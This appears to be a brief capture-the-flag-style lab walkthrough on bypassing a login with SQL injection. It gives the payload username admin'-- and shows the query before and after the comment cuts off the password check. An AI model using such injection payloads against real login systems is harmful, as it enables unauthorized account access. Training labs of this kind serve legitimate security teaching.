Lab: SQL injection vulnerability allowing login bypass

Solving




PreviousLab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataNextLab: Reflected XSS into HTML context with nothing encoded
Last updated





Last updated
username: admin'--
password: <anything>SELECT * FROM users WHERE username = 'admin' AND password = '1234';SELECT * FROM users WHERE username = 'admin'--' AND password = '1234';